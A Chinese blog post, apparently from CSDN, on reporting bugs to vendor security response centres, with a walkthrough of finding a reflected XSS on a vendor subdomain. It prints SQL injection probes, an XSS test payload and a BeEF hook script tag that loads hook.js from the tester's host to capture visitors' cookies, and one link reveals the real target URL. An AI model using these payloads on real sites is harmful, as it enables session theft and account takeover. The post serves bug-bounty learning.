src 漏洞平台应急响应中心提交漏洞简介

￡神魔★判官ぃ 2021-09-01 06:43 905阅读 0赞

**目录**

1 漏洞平台

2 网站情况

3 发现/提交漏洞

4 思路总结

--------------------

### 1 漏洞平台 ###

漏洞银行

[https://www.bugbank.cn/][https_www.bugbank.cn]

漏洞盒子

[https://www.vulbox.com/][https_www.vulbox.com]

i春秋SRC部落

[https://www.ichunqiu.com/src][https_www.ichunqiu.com_src]

补天漏洞响应平台

[https://butian.360.cn/][https_butian.360.cn]

腾讯安全应急响应中心

[http://security.tencent.com/][http_security.tencent.com]

网易安全中心

[http://aq.163.com/][http_aq.163.com]

京东安全应急响应中心

[http://security.jd.com/][http_security.jd.com]

百度安全响应中心

[http://sec.baidu.com/][http_sec.baidu.com]

阿里巴巴集团安全应急响应中心

[http://security.alibaba.com/][http_security.alibaba.com]

新浪安全应急响应中心

[http://sec.sina.com.cn/][http_sec.sina.com.cn]

金山安全应急响应中心

[http://sec.kingsoft.com/][http_sec.kingsoft.com]

乌云漏洞报告平台

[http://www.wooyun.org][http_www.wooyun.org]

360库带计划

[http://loudong.360.cn][http_loudong.360.cn]

国家信息安全漏洞共享平台

[http://www.cnvd.org.cn/][http_www.cnvd.org.cn]

蚂蚁金服安全响应中心

[https://security.alipay.com/][https_security.alipay.com]

去哪儿网安全应急响应中心

[http://security.qunar.com/][http_security.qunar.com]

银联安全应急响应中心

[https://security.unionpay.com/][https_security.unionpay.com]

同程安全应急响应中心

[https://sec.ly.com/bugs][https_sec.ly.com_bugs]

### 2 网站情况 ###

常见漏洞类型:

XSS、SQL注入、CSRF、权限绕过、文件上传、弱口令、代码执行等等。

发现漏洞方法：

1. 手工寻找（XSS，SQL注入，CSRF等等）。

难度系数：⭐⭐⭐⭐  牛逼指数：⭐⭐⭐⭐⭐

一般漏洞平台上除了刚出的服务厂商，其他大多数很明显的漏洞都被提交过了，手工找有些难度，有些网站在对非法字符的过滤也很到位，在url尝试是否存在sql注入，如 and 1=2 ，网站防护机制对用户一旦出现此类非法字符串，便对访问者ip进行连接重置，一段时间后才能访问。

2. 工具扫描/辅助（AWVS、Nessus、sqlmap等等）

难度系数：⭐⭐  牛逼指数：⭐⭐⭐

在漏洞平台上的厂商，同样大部分明显直接的漏洞比较少，再加上有的有防火墙和web服务器配置，很多网站只要’察觉’到一个ip的非正常访问（比如扫描网站），就直接采用连接重置，或者无法访问，对扫描ip墙在外面。所以扫描工具的使用，也有一定条件。

3. 手工寻找+工具扫描/辅助

难度系数：⭐⭐⭐  牛逼指数：⭐⭐⭐⭐ 实用指数：⭐⭐⭐⭐⭐

通过工具的辅助，找到漏洞点再结合自身知识利用漏洞，往往事半功倍，很有效果

**防护情况案例一:**（可能会涉及到什么所以对厂商均打码）

厂商：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70][]

子网站教务系统，页面通过单独窗口实现信息显示，url无法测试。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 1][]

**防护情况案例二：**

厂商

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 2][]

找到asp脚本编写同时有id传参的页面

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 3][]

尝试注入语句

/video\_list.aspx?s\_classid=221 and 1=2

回车

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 4][]

防火墙拦截。

防护情况案例三：

厂商：大部分厂商

即扫描工具扫描，服务器防御灵敏的直接墙掉ip，放宽点的当你扫描一定时候到达一定的时候，重置连接。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 5][]

### 3 发现/提交漏洞 ###

厂商

网址：

![20190308145339598.png][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 6][]

发现步骤

1. 手工寻找

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 7][]

网页的大部分新闻内容全为静态的内容，无下手之地。

直到

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 8][]

进入后是该网站的一个子网站，熟悉的php，寻找漏洞点

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 9][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 10][]

在手工找不到可能存在的漏洞点，尝试工具扫描

使用工具（AWVS）进行站点扫描

幸运的是，该站点对扫描没有进行设置防御，

扫到该站点的目录

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 11][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 12][]

其中Forbidden是权限不够无法访问，但是文件存在。

接下来，很明显的看到了极有可能是后台admin目录

不幸的是，能访问，文件也存在，无回显内容

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 13][]

一片空白，继续换下一个思路

查看是否存在漏洞。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 14][]

其中显目的第一个 Cross Site Scripting (XSS)

寻找到这三个漏洞点

![20190308144342186.png][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 15][]

进入直接弹出对话框

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 16][]

接下来看是什么地方存在漏洞点：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 17][]

渗透测试XSS语句

'%22()%26%25<acx><ScRiPt%20>prompt(931058)</ScRiPt>&system=ask&url=e

经过简化

%22 是url编码后的，原数据为 ” ，一个双引号，用于对html元素属性进行结束

效果等同于："><ScRiPt >alert(123)</ScRiPt>

这里<acx><ScRiPt%20>prompt(931058)</ScRiPt> script采用了大小写重复，常用的绕过方法。其中prompt(931058) 是js中与用户交互的提示框，标题就为931058.

其中prompt（931058）是工具的测试语句，换成熟悉的alert(‘XSS’) 便明显很多。

这也能说明当右键编辑http请求的时候会弹出对话框。

![20190308144342367.png][]

知道漏洞点漏洞原理后，找到漏洞点：

/index.php/core/uploader-image\_cut?module=item&system=ask&url=e

其中[/index.php/core][index.php_core]为上文的注册页面，手工注册是打不开的，这也说明了工具利用的重要性。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 18][]

利用测试语句测试漏洞的存在

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 19][]

漏洞是存在的，单单的弹窗无法提现出此漏洞的作用，

接下来利用XSS漏洞

利用工具：beef （kali下的xss平台）

利用步骤：

1. beef工具平台开启

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 20][]

Kali ip:192.168.88.149

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 21][]

2. 制造XSS利用链接:

’"()<acx><script src="http://192.168.88.149:3000/hook.js"> </script>

3. 访问者访问

Win10

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 22][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 23][]

回车后，直观上网页无反应

4. 查看beef平台

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 24][]

可以看到ip,操作系统，系统软件的配置

重要的在下面

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 25][]

拿到访问者的访问cookie，可通过改包修改cookie登录访问者用户。

到此结束，没有进一步的渗透（还不会高级的）。

下面为漏洞提交的页面

![20190308220204789.png][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 26][]![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 27][]

### 4 思路总结 ###

1. 学会工具和手工结合，会有意外收获。

2. 常规注入点，漏洞点别放过。

3. 发现漏洞，需测试漏洞的存在性（别破坏网站的完整）

4. 漏洞利用，进一步提现漏洞的价值性，在提交的时候需要有漏洞利用过程截图等。

5. 最后提出解决方案，完事。

不做破坏！授权测试！

[https_www.bugbank.cn]: https://www.bugbank.cn/
[https_www.vulbox.com]: https://www.vulbox.com/
[https_www.ichunqiu.com_src]: https://www.ichunqiu.com/src
[https_butian.360.cn]: https://butian.360.cn/
[http_security.tencent.com]: http://security.tencent.com/
[http_aq.163.com]: http://aq.163.com/
[http_security.jd.com]: http://security.jd.com/
[http_sec.baidu.com]: http://sec.baidu.com/
[http_security.alibaba.com]: http://security.alibaba.com/
[http_sec.sina.com.cn]: http://sec.sina.com.cn/
[http_sec.kingsoft.com]: http://sec.kingsoft.com/
[http_www.wooyun.org]: http://www.wooyun.org/
[http_loudong.360.cn]: http://loudong.360.cn/
[http_www.cnvd.org.cn]: http://www.cnvd.org.cn/
[https_security.alipay.com]: https://security.alipay.com/
[http_security.qunar.com]: http://security.qunar.com/
[https_security.unionpay.com]: https://security.unionpay.com/
[https_sec.ly.com_bugs]: https://sec.ly.com/bugs
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70]: /images/20210728/7471718884be4764a730889df5df9f16.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 1]: /images/20210728/97d185a4ea1f4457b596f51d16e3c8b6.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 2]: /images/20210728/e0eadbc95d044d1891d94ffe0f6cb0cd.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 3]: /images/20210728/af80623fa4af47d9a2752e6aff7fb975.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 4]: /images/20210728/3130ba3847524c86bc60077aede86570.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 5]: /images/20210728/2d033cc120e54f64b8c2c9f33eb95584.png
[20190308145339598.png]: /images/20210728/6ae53f6724db4e05a65b3d02ff7ff6bc.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 6]: /images/20210728/756a8a5b7e1a4ab5a8ed06b266f76205.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 7]: /images/20210728/9a78238890b243c8aa270a8cc8b1c3ac.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 8]: /images/20210728/7da9b7e3e40f4f208da43250f5adfad0.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 9]: /images/20210728/2137f56d5bb54102892766857ba0705c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 10]: /images/20210728/def28ded9ac1424aa2bc4962a99c8bc1.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 11]: /images/20210728/1907c97bc43b45328146cdc65366826c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 12]: /images/20210728/37d2ec8159a74cd8aebc9697f2760e52.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 13]: /images/20210728/bbf8230e38cc4d9787a724dc22b78d77.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 14]: /images/20210728/305c1e5febe3452ca4c18032f5f5476b.png
[20190308144342186.png]: /images/20210728/b587316b3de943dc9a3b6d1cde691903.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 15]: /images/20210728/cb000a77489e42fcac8c9e71d8e06d02.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 16]: /images/20210728/511be1d2f71343cbba3b91c2e138b046.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 17]: /images/20210728/87cb0ee9bc9043cf94d72c9c4766e2f9.png
[20190308144342367.png]: /images/20210728/60d85e80013d4627abcd8356bcc5066a.png
[index.php_core]: http://xxgk.sicp.sh.cn/index.php/core
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 18]: /images/20210728/aafe7f8ba10c471ca13e3661bea02a0c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 19]: /images/20210728/3f83a1469c7842e89880fcd32a7f4f83.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 20]: /images/20210728/6a35c46788384907b5f640e24053dc86.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 21]: /images/20210728/768d2da07dd5445899f16dfa4d44a8da.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 22]: /images/20210728/3a7f377f321343fb9d02d306cec7a12a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 23]: /images/20210728/45b980bed19147a39fe2733d07e6334a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 24]: /images/20210728/e9511f58fbe748df9667c5948cd5fd1c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 25]: /images/20210728/61022e9d12464a5c8d4369c59d293559.png
[20190308220204789.png]: /images/20210728/787ebd40d39244ed96760dcd87856870.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 26]: https://img-blog.csdnimg.cn/20190308220337920.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM3OTY0OTg5_size_16_color_FFFFFF_t_70 27]: /images/20210728/21f4c25bd2da44cb84c2ae82d3699e60.png